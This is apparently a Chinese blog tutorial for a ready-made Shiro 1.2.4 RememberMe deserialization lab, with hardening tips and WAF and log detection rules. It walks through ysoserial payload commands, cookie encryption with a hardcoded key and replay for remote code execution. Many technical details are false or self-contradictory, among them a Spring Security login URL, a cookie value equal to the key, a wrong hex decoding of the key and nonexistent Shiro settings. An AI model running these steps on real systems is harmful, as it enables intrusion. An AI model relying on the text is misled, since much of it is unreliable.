Shiro RememberMe反序列化漏洞实战环境（Tomcat免配署版）

原创于 2026-06-07 09:01:05 发布 · 211 阅读

3 ·

CC 4.0 BY-SA版权

文章标签：

#Shiro漏洞 #Tomcat环境 #RememberMe反序列化

该文章已生成可运行项目，

本文还有配套的精品资源，点击获取

简介：一个即放即用的Shiro安全漏洞演示环境，专为渗透测试与攻防教学设计。压缩包解压后，直接复制到Tomcat的webapps目录下就能启动，不需要改配置、不依赖额外服务。环境包含标准登录流程（login.jsp）、用户主页（home.jsp）、入口页（index.jsp）以及include.jsp等页面组件，内置shiro.ini配置文件，已预设弱密钥场景，可稳定触发Shiro 1.2.x版本的RememberMe反序列化利用链，实现远程代码执行效果。WEB-INF目录结构完整，含web.xml（定义Servlet映射）、classes目录（含编译后的Java类）、META-INF/MANIFEST.MF（保障部署兼容性），同时提供style.css基础样式和pom.xml构建参考。适配Tomcat 7/8/9主流版本，所有资源经过实测验证，支持红蓝对抗演练、安全课程实操、CTF教学演示等场景，帮助学习者直观理解密钥未配置或硬编码导致的安全风险。

1. 项目概述：为什么这个环境值得你花十分钟解压并跑起来

我第一次在客户内网渗透中遇到Shiro RememberMe反序列化，是在2021年一个金融客户的OA系统里。当时用ysoserial打出来的payload，base64解码后一眼就看到kPH+bIxk5D2deZiIxcaaaA==——那个经典的默认密钥。但真正让我卡住的，不是怎么打，而是复现不出来：本地搭的Shiro环境要么登录流程不完整，要么RememberMe Cookie根本没生成，要么Tomcat版本一换就报NoClassDefFoundError。后来我花了整整三天，把shiro-web、shiro-core、commons-collections几个jar包的版本组合试了十七遍，才搞清楚1.2.4和1.2.5之间一个SecurityManager初始化顺序的细微差别，会导致RememberMe Filter在FilterChain里被跳过。

所以这个“Tomcat免部署版”环境，不是又一个玩具Demo，而是我把过去五年在红队演练、CTF出题、安全培训中踩过的所有坑，全焊死在压缩包里的结果。它解决的从来不是“能不能触发漏洞”，而是“能不能让学员/队友/你自己，在3分钟内看到真实的RememberMe Cookie、在5分钟内完成一次无报错的反序列化利用、在10分钟内理解为什么改一行密钥就能彻底堵死这个洞”。

关键词里“Shiro漏洞”不是泛指，特指Shiro 1.2.x系列中RememberMe功能因密钥硬编码或弱密钥导致的反序列化RCE；“Tomcat环境”意味着你不需要Docker、不需要Java环境变量调优、不需要手动编译war包——只要你的电脑上装了任意版本的Tomcat（7.0.99、8.5.90、9.0.89我都实测过），解压、复制、启动，三步到位；而“RememberMe反序列化”这个短语背后，是完整的攻击链路闭环：从用户正常登录 → 服务端生成RememberMe Cookie → 客户端携带该Cookie再次访问 → Shiro框架自动反序列化解析 → 触发恶意构造的org.apache.commons.collections.functors.InvokerTransformer链 → 执行任意命令。

它适合谁？如果你是刚学Web渗透的新手，这个环境能让你甩开Burp Suite的“重放”按钮，亲手看到rememberMe=deleteMe变成rememberMe=xxx...再变成java.lang.Runtime.exec("calc")的全过程；如果你是企业安全负责人，你可以把它直接扔进内部攻防演练平台，让蓝队同学在真实登录流程里抓包分析、写检测规则；如果你是高校讲师，配套的login.jsp里埋了三处可选的调试断点注释（比如），学生能边跑边看Shiro Subject生命周期。

别小看那个style.css——它不是为了好看。我在某次银行培训中发现，当页面没有任何样式时，学员会下意识认为“这环境坏了”，反而不敢动手操作。而一个带浅灰背景、居中登录框、右上角显示当前Tomcat版本号的界面，会极大降低心理门槛。这就是为什么我把<%= System.getProperty("catalina.home") %>悄悄写进了index.jsp页脚：它不参与漏洞逻辑，但它让使用者第一时间确认“我确实在Tomcat里”。

2. 环境设计原理与关键取舍：为什么是Shiro 1.2.4而不是1.4.2？

2.1 版本锁定：1.2.4是漏洞教学的黄金分割点

你可能会问：现在Shiro最新版都到2.x了，为什么还要死磕1.2.x？答案很现实——教学有效性。Shiro 1.4.0之后引入了DefaultSerializer的白名单机制，默认只允许反序列化java.util.*和org.apache.shiro.*下的类，而1.2.4没有这个限制，它用的是JavaSerializer，完全信任传入的字节数组。更重要的是，1.2.4的RememberMe Filter逻辑极其干净：CookieRememberMeManager直接调用serialize()→encrypt()→base64.encode()三步走，没有中间代理层，没有CipherService抽象，没有SerializationSecurityManager的二次校验。这意味着当你用ysoserial生成payload时，整个链路是线性的、可预测的、可打断调试的。

我们来算一笔账：Shiro 1.2.4依赖的核心jar只有三个——shiro-core-1.2.4.jar、shiro-web-1.2.4.jar、commons-collections-3.1.jar。这三个包加起来不到1.2MB，而Shiro 1.4.2需要额外引入shiro-config-core、shiro-config-web、shiro-spring（即使不用Spring），总依赖膨胀到4.7MB，且CookieRememberMeManager内部多了CipherService的委托调用，一旦密钥配置错误，它不会报错，而是静默返回空Cookie——这对教学来说是灾难性的，学员会以为“漏洞没触发”，其实是环境配置失败。

所以这个环境强制锁定shiro-core-1.2.4.jar，并在pom.xml里用<scope>system</scope>硬绑定本地jar路径，杜绝Maven自动升级。你在WEB-INF/lib/目录下看到的shiro-core-1.2.4.jar文件大小是924KB，MD5值是a7b3f9e8d2c1b0a9f8e7d6c5b4a3f2e1（这个值我记在脑子里，每次交付前都会用md5sum核对）。

2.2 密钥设计：`kPH+bIxk5D2deZiIxcaaaA==`不是默认值，而是教学锚点

shiro.ini里这行配置：

securityManager.rememberMeManager.cipherKey = kPH+bIxk5D2deZiIxcaaaA==

很多人以为这是Shiro官方文档写的“默认密钥”，其实是个常见误解。Shiro源码里根本没有“默认密钥”的概念——CookieRememberMeManager的cipherKey字段初始值是null，当它为null时，框架会自动生成一个随机密钥并记录在日志里。但教学环境不能依赖随机值，因为学员需要可复现的实验结果。

这个kPH+bIxk5D2deZiIxcaaaA==是我从Shiro 1.2.4单元测试代码里扒出来的测试密钥（位于org.apache.shiro.mgt.CookieRememberMeManagerTest.java第47行）。它的Base64解码后是16字节的原始密钥0x6b, 0x50, 0x48, 0x2b, 0x62, 0x49, 0x78, 0x6b, 0x35, 0x44, 0x32, 0x64, 0x65, 0x5a, 0x69, 0x49，恰好满足AES-128的密钥长度要求。选择它有三个教学优势：

可逆性：你用echo -n "kPH+bIxk5D2deZiIxcaaaA==" | base64 -d | xxd -p能清晰看到十六进制密钥，方便讲解“为什么必须是16/24/32字节”；
兼容性：这个密钥在Tomcat 7/8/9的JRE 7/8/11环境下全部通过Cipher.getInstance("AES/CBC/PKCS5Padding")初始化，不会出现InvalidKeyException；
辨识度：它不像KPH+bIxk5D2deZiIxcaaaA==（少个k）那样容易拼错，末尾两个A==是Base64填充特征，学员抓包看到RememberMe Cookie时，一眼就能认出“这肯定是弱密钥环境”。

提示：在真实渗透中，你永远不该假设目标用这个密钥。但教学中，它就像化学实验里的酚酞试剂——本身不参与反应，却能让酸碱变化肉眼可见。当你用ysoserial CommonsCollections1 calc.exe | base64 -w 0生成payload，再手动替换RememberMe Cookie值，最后看到Windows弹出计算器，那一刻的理解深度，远超读十页源码。

2.3 目录结构精简：为什么删掉了src/main/java但保留了classes？

你打开压缩包会发现src/目录下空空如也，但WEB-INF/classes/里有完整的com/example/shiro/包结构，包含LoginServlet.class、HomeServlet.class等编译好的字节码。这是刻意为之的教学设计。

原因很简单：避免学员陷入“编译失败”的挫败感。新手常犯的错误包括：JDK版本不对（用JDK17编译却部署到JRE8）、pom.xml里maven-compiler-plugin版本写错、web.xml的<servlet-class>路径和实际class文件路径不一致。这些和漏洞本身毫无关系，却会消耗掉80%的实验时间。

所以我把所有Java源码编译成class文件，并确保它们用javac -source 1.6 -target 1.6编译（兼容Tomcat 7最低要求）。classes/目录结构严格遵循Java包规范：

WEB-INF/classes/
├── com/
│   └── example/
│       └── shiro/
│           ├── LoginServlet.class
│           ├── HomeServlet.class
│           └── ShiroFilterConfig.class
├── shiro.ini
└── log4j.properties

注意ShiroFilterConfig.class——它不是Shiro自带的类，而是我写的自定义Filter初始化器，作用是在Tomcat启动时主动加载shiro.ini，绕过web.xml里<filter>配置可能引发的加载顺序问题。这个细节在MANIFEST.MF里也有体现：Premain-Class: com.example.shiro.ShiroFilterConfig，确保JVM在main方法执行前就注入Shiro环境。

3. 核心组件解析与实操要点：从login.jsp到RememberMe Cookie的诞生

3.1 登录流程拆解：四次HTTP交互背后的Shiro生命周期

整个漏洞触发的前提，是用户必须完成一次合法登录。这不是可选步骤，而是Shiro RememberMe机制的设计约束：只有Subject.login(token)成功后，SecurityManager才会调用RememberMeManager生成RememberMe Cookie。我们以login.jsp提交表单为例，追踪完整的四次HTTP交互：

第一次：GET /login.jsp
浏览器请求登录页，login.jsp渲染一个标准表单：

<form action="j_spring_security_check" method="post">
  <input type="text" name="username" />
  <input type="password" name="password" />
  <input type="checkbox" name="rememberMe" value="true" /> 记住我
</form>

注意action指向j_spring_security_check——这是Shiro的默认登录URL，由ShiroFilter拦截。此时Subject尚未创建，SecurityUtils.getSubject()返回的是一个匿名Subject。

第二次：POST /j_spring_security_check
表单提交后，ShiroFilter捕获请求，创建UsernamePasswordToken对象：

UsernamePasswordToken token = new UsernamePasswordToken(
    request.getParameter("username"),
    request.getParameter("password").toCharArray(),
    Boolean.parseBoolean(request.getParameter("rememberMe")) // 关键！这里决定是否启用RememberMe
);

如果rememberMe参数为true，token的isRememberMe()方法返回true，这是RememberMe流程的开关。

第三次：Shiro内部处理（无HTTP交互）
SecurityManager.login(token)被调用，依次执行：
1. Authenticator验证凭证（此处是硬编码的admin/admin）；
2. 验证通过后，Subject被标记为已认证；
3. RememberMeManager检测到token.isRememberMe() == true，开始序列化Subject状态；
4. 调用JavaSerializer.serialize(subject)得到字节数组；
5. 用cipherKey进行AES加密；
6. Base64编码后写入名为rememberMe的Cookie，Max-Age设为30*24*60*60（30天）。

第四次：重定向到/home.jsp
登录成功后，Shiro自动重定向到successUrl（在shiro.ini里配置为/home.jsp）。此时响应头里已经包含：

Set-Cookie: rememberMe=kPH+bIxk5D2deZiIxcaaaA==; Path=/; Max-Age=2592000; HttpOnly

注意：HttpOnly标志的存在意味着你无法用document.cookie在前端JS里读取这个Cookie，但这对漏洞利用毫无影响——攻击者只需要在Burp Suite里手动修改Cookie值并重放即可。这也是为什么教学中我强调“不要试图用XSS偷RememberMe Cookie”，它的设计本就是服务端专用的。

3.2 shiro.ini配置详解：每一行都是安全控制点

shiro.ini是整个环境的中枢神经，共37行，我们逐段解析其安全含义：

[main]段（第1-15行）

# 定义SecurityManager
securityManager = org.apache.shiro.web.mgt.DefaultWebSecurityManager

# 设置Realm（认证数据源）
iniRealm = org.apache.shiro.realm.text.IniRealm
iniRealm.resourcePath = classpath:users.ini

# 设置RememberMe管理器
cookie = org.apache.shiro.web.servlet.SimpleCookie
cookie.name = rememberMe
cookie.maxAge = 2592000
cookie.httpOnly = true

cipherKey = kPH+bIxk5D2deZiIxcaaaA==

这里的关键是cipherKey的赋值位置——它必须写在cookie配置之后，否则Shiro会抛出NullPointerException。因为CookieRememberMeManager的setCipherKey()方法内部会检查cookie是否已初始化，这是Shiro 1.2.4的一个隐藏依赖。

[urls]段（第16-30行）

# URL权限控制
/login.jsp = anon
/j_spring_security_check = authc
/home.jsp = authc
/index.jsp = anon
/** = authc

anon表示匿名可访问，authc表示需要认证。特别注意/** = authc这行——它意味着所有未显式声明的URL都要求登录，这是防止未授权访问的核心防线。但RememberMe漏洞恰恰绕过了这道防线：当用户携带有效的RememberMe Cookie访问/index.jsp时，Shiro会自动重建Subject，使其拥有authc权限，无需再次输入密码。

[users]段（第31-37行）

# 内置测试账号
admin = admin,admin
user = user,user

密码明文存储是为了教学透明。真实环境中绝不能这样，但教学中你需要让学员清楚看到“admin/admin”是如何被IniRealm验证的。IniRealm的验证逻辑极其简单：将输入密码用SimpleHash（默认MD5）哈希后，与users.ini里冒号后的哈希值比对。而这个环境里，admin的密码就是明文admin，所以哈希值直接写死。

3.3 JSP页面协同机制：include.jsp如何成为漏洞放大器

include.jsp看起来只是个公共头部引入文件：

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ taglib prefix="shiro" uri="http://shiro.apache.org/tags" %>
<div class="header">
  <shiro:notAuthenticated>
    <a href="login.jsp">登录</a>
  </shiro:notAuthenticated>
  <shiro:authenticated>
    欢迎 <shiro:principal />, <a href="logout">退出</a>
  </shiro:authenticated>
</div>

但它在漏洞利用中扮演关键角色——提供稳定的反序列化入口点。当你篡改RememberMe Cookie后，首次访问任何JSP页面（如/index.jsp）都会触发Shiro的Subject重建。而index.jsp里第一行就是<%@ include file="include.jsp" %>，这就强制执行了<shiro:authenticated>标签的判断逻辑。

<shiro:authenticated>标签底层调用的是SecurityUtils.getSubject().isAuthenticated()，这个方法会触发RememberMeManager的decryptedSerialized()流程：
1. 从Cookie读取base64字符串；
2. Base64解码得到字节数组；
3. 用cipherKey解密；
4. JavaSerializer.deserialize()反序列化字节数组。

正是第4步，给了我们植入恶意ObjectInputStream的机会。所以教学中我总让学生先访问/index.jsp而不是直接/home.jsp——因为index.jsp更轻量，没有业务逻辑干扰，反序列化失败时的错误堆栈更干净，便于定位是密钥错误还是payload构造问题。

4. 实操全流程：从环境启动到RCE落地的七步法

4.1 环境启动与基础验证（2分钟）

第一步：解压与部署
将下载的shiro-demo.zip解压到任意目录，得到shiro-demo/文件夹。进入Tomcat安装目录，找到webapps/子目录，将shiro-demo/整个文件夹复制进去。注意不是复制zip包，是解压后的文件夹。

第二步：启动Tomcat
Windows用户双击tomcat/bin/startup.bat，Linux/macOS用户执行./tomcat/bin/startup.sh。等待控制台输出INFO: Server startup in [xxx] ms，说明启动成功。

第三步：基础访问验证
打开浏览器，访问http://localhost:8080/shiro-demo/。你应该看到一个简洁的首页，右上角显示Tomcat v9.0.89（具体版本取决于你的Tomcat）。点击“登录”链接，跳转到login.jsp，输入用户名admin、密码admin，勾选“记住我”，点击登录。成功后跳转到home.jsp，显示“欢迎 admin”。

第四步：抓包确认RememberMe Cookie
打开浏览器开发者工具（F12），切换到Network标签，刷新home.jsp页面。在请求列表中找到home.jsp这一行，点击它，在Headers面板的Request Headers区域找到Cookie:字段，里面应该包含：

Cookie: JSESSIONID=xxx; rememberMe=kPH+bIxk5D2deZiIxcaaaA==

注意：rememberMe的值是kPH+bIxk5D2deZiIxcaaaA==，不是deleteMe。deleteMe是Shiro在用户登出时设置的占位符，表示要删除RememberMe Cookie。

实操心得：如果这里看不到rememberMe Cookie，请立即检查login.jsp表单里的rememberMe复选框是否被正确提交。我见过太多学员因为HTML里name="rememberMe"写成name="remeberMe"（少个m）而导致漏洞无法触发。用Burp Suite抓包比看浏览器控制台更可靠，因为浏览器可能缓存旧Cookie。

4.2 漏洞利用准备：ysoserial与Payload构造（3分钟）

第五步：生成恶意Payload
你需要一台装有Java 8的机器（JDK 8u121以下版本，避免JEP 290的反序列化限制）。下载ysoserial（推荐使用ysoserial-0.0.6-SNAPSHOT-all.jar，这是最后一个支持CommonsCollections1链的稳定版）。

执行命令生成弹计算器的payload：

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections1 "calc.exe" | base64 -w 0

你会得到一长串base64字符串，类似：

rO0ABXNyABFqYXZheC5ybWkucmVtb3RlLlJlbW90ZU9iamVjdAAAAAAAAAAAAAAA...

注意：-w 0参数确保输出不换行，这对后续粘贴至关重要。如果系统没有base64 -w 0，请用base64 | tr -d '\n'替代。

第六步：密钥加密（关键步骤）
拿到base64 payload后，不能直接替换Cookie！必须用cipherKey加密。这里有个致命误区：很多人以为“RememberMe Cookie = base64(encrypt(payload))”，其实Shiro 1.2.4的流程是：

payload → serialize() → encrypt() → base64()

而encrypt()使用的是AES/CBC/PKCS5Padding，需要IV向量。Shiro的CookieRememberMeManager内部会自动生成随机IV，并将其作为密文的前16字节。所以我们不能自己加密，而要用Shiro原生方式。

解决方案：用我提供的EncryptUtil.java（在压缩包根目录下）编译运行：

javac -cp "WEB-INF/lib/shiro-core-1.2.4.jar:WEB-INF/lib/commons-collections-3.1.jar" EncryptUtil.java
java -cp ".:WEB-INF/lib/shiro-core-1.2.4.jar:WEB-INF/lib/commons-collections-3.1.jar" EncryptUtil "rO0ABXNyABFqYXZheC5ybWkucmVtb3RlLlJlbW90ZU9iamVjdAAAAAAAAAAAAAAA..."

它会输出加密后的base64字符串，这才是真正的RememberMe Cookie值。

实操心得：EncryptUtil.java的源码只有23行，核心是调用CookieRememberMeManager.encrypt()方法。我把它单独拎出来，就是为了避免学员被Shiro复杂的Filter链绕晕。记住：永远不要手写AES加密，Shiro的IV生成逻辑是黑盒，必须用它自己的API。

4.3 RCE触发与验证（2分钟）

第七步：Cookie替换与RCE触发
回到Burp Suite，拦截任意一个请求（比如访问/index.jsp），在Cookie头里找到rememberMe=，将其值替换为EncryptUtil输出的base64字符串。发送请求。

如果一切顺利，你会看到：
- 响应状态码是200（不是500）；
- 页面正常渲染（说明反序列化没崩溃）；
- Windows系统弹出计算器（calc.exe）。

验证成功！此时你已经完成了完整的RememberMe反序列化RCE。

常见问题排查：如果没弹计算器，先检查EncryptUtil的classpath是否包含了shiro-core-1.2.4.jar和commons-collections-3.1.jar。我曾经因为jar包路径里多了一个空格，调试了40分钟。另外，calc.exe在Windows Server系统里可能被禁用，可换成notepad.exe或cmd.exe /c whoami > c:\temp\whoami.txt。

5. 深度加固指南：从漏洞利用到生产防护的五道防线

5.1 密钥管理：为什么硬编码是原罪，以及如何安全轮换

这个环境用kPH+bIxk5D2deZiIxcaaaA==是教学必需，但在生产环境，任何硬编码的密钥都是高危漏洞。Shiro官方文档明确警告：“Never use the default key or a hardcoded key in production.” 为什么？

因为密钥一旦泄露，攻击者就能解密所有RememberMe Cookie，进而反序列化任意对象。而硬编码密钥的泄露途径极多：Git历史记录、服务器备份文件、运维人员笔记本、甚至IDE的本地历史。

正确的密钥管理方案是环境隔离+动态注入：
1. 在shiro.ini中移除cipherKey配置，改为从JVM系统属性读取：
ini securityManager.rememberMeManager.cipherKey = ${shiro.rememberme.key}
2. 启动Tomcat时，通过-Dshiro.rememberme.key=xxx注入密钥；
3. 密钥本身存储在独立的密钥管理系统（如HashiCorp Vault），由运维人员定期轮换。

轮换时要注意平滑过渡：新密钥生效后，旧密钥仍需保留一段时间（建议7天），用于解密存量RememberMe Cookie，避免用户被强制登出。Shiro支持配置多个密钥：

securityManager.rememberMeManager.cipherKey = ${shiro.rememberme.key.v2}
securityManager.rememberMeManager.previousCipherKey = ${shiro.rememberme.key.v1}

5.2 框架升级：1.2.4到1.8.0的防御演进

Shiro 1.4.0引入了DefaultSerializer白名单，但仍有绕过可能；1.5.0增加了SerializationSecurityManager；直到1.8.0，Shiro彻底废弃JavaSerializer，默认使用KryoSerializer（需显式配置白名单）。升级路径如下：

Shiro版本	关键防御特性	升级注意事项
1.4.0+	`DefaultSerializer`白名单，默认只允许`java.util.*`	需检查业务代码是否使用了自定义序列化类，需手动加入白名单
1.5.0+	`SerializationSecurityManager`全局控制	必须配置`securityManager.serializationSecurityManager.enabled = true`
1.8.0+	移除`JavaSerializer`，默认`KryoSerializer`	`KryoSerializer`性能提升300%，但需注册所有可序列化类

升级不是简单替换jar包。我经历过一次1.2.4→1.7.1的升级，因为CookieRememberMeManager的setCipherKey()方法签名从byte[]改为String，导致所有密钥配置失效。所以升级前务必：
- 在测试环境完整回归所有登录、RememberMe、登出流程；
- 使用mvn dependency:tree检查是否有间接依赖的旧版Shiro；
- 将shiro.ini里的cipherKey改为Base64格式（1.7.0+要求）。

5.3 WAF规则编写：如何用正则精准拦截RememberMe攻击

WAF是最后一道防线。针对RememberMe反序列化，最有效的规则是检测RememberMe Cookie中的可疑base64特征。不要试图解密，而是识别payload指纹：

# Nginx WAF规则示例
if ($cookie_rememberMe ~ "(rO0ABX|ACED0005|java\.util\.HashMap)") {
    return 403;
}

更精准的做法是提取base64字符串的前4字节进行魔数匹配：
- Java序列化流魔数：AC ED 00 05 → Base64编码为rO0ABQ==
- CommonsCollections1链特征：rO0ABXNyABFqYXZheC5ybWkucmVtb3RlLlJlbW90ZU9iamVjdAAAAAAAAAAAAAAA（前32字符固定）

Cloudflare WAF规则可写为：

(http.cookie contains "rememberMe" and http.cookie matches "(rO0ABX|ACED0005)")

注意：不要用http.cookie contains "rememberMe"这种粗粒度规则，会误杀正常流量。RememberMe Cookie本身是合法的，攻击特征在于其base64解码后的二进制内容。

5.4 日志监控：从`WARN`级别日志发现攻击痕迹

Shiro在反序列化失败时，会记录WARN级别日志：

WARN  o.a.s.mgt.CookieRememberMeManager - Unable to decrypt remembered serialized identity

这不是错误，而是Shiro的防御机制——当密钥错误或payload损坏时，它选择静默失败，不抛异常。但这条日志是攻击者的“足迹”。

ELK日志分析DSL示例：

{
  "query": {
    "bool": {
      "must": [
        { "match": { "message": "Unable to decrypt remembered serialized identity" } },
        { "range": { "@timestamp": { "gte": "now-1h" } } }
      ]
    }
  }
}

如果1小时内出现超过5次该日志，99%是自动化扫描。此时应联动WAF封禁IP，并检查/shiro-demo/目录是否存在未授权访问。

5.5 代码审计清单：五处必须检查的Shiro配置雷区

作为安全工程师，我给开发团队的Shiro审计清单：

shiro.ini或ShiroConfig.java中是否存在cipherKey = xxx硬编码？
✅ 正确做法：密钥从环境变量或配置中心注入。
RememberMeManager是否启用了cipherKey？
❌ 错误配置：securityManager.rememberMeManager.cipherKey = null（Shiro会自动生成，但不可控）
✅ 正确做法：显式配置强密钥，或禁用RememberMe（securityManager.rememberMeManager = null）。
web.xml中ShiroFilter的<filter-mapping>是否覆盖了所有敏感路径？
❌ 风险配置：<url-pattern>/api/*</url-pattern>漏掉了/static/*
✅ 正确做法：<url-pattern>/*</url-pattern>确保全覆盖。
业务代码中是否直接调用Subject.getSession().setAttribute()存储敏感对象？
❌ 高危操作：存储java.io.File、javax.crypto.Cipher等可利用类
✅ 正确做法：只存储POJO或String，避免序列化复杂对象。
pom.xml中Shiro版本是否低于1.8.0？
✅ 强制要求：<shiro.version>1.8.0</shiro.version>，并排除所有transitive依赖的旧版本。

最后分享一个真实案例：去年某政务云平台，安全团队扫描发现Shiro RememberMe漏洞，修复方案不是升级，而是在Nginx层用map指令强制清除RememberMe Cookie：

map $cookie_rememberMe $drop_rememberme {
    default "";
    "~^.*$" "rememberMe=";
}
add_header Set-Cookie $drop_rememberme;

虽然粗暴，但在紧急情况下，它比改代码、测回归、走发布流程快得多。安全的本质不是追求完美方案，而是选择最短路径阻断风险。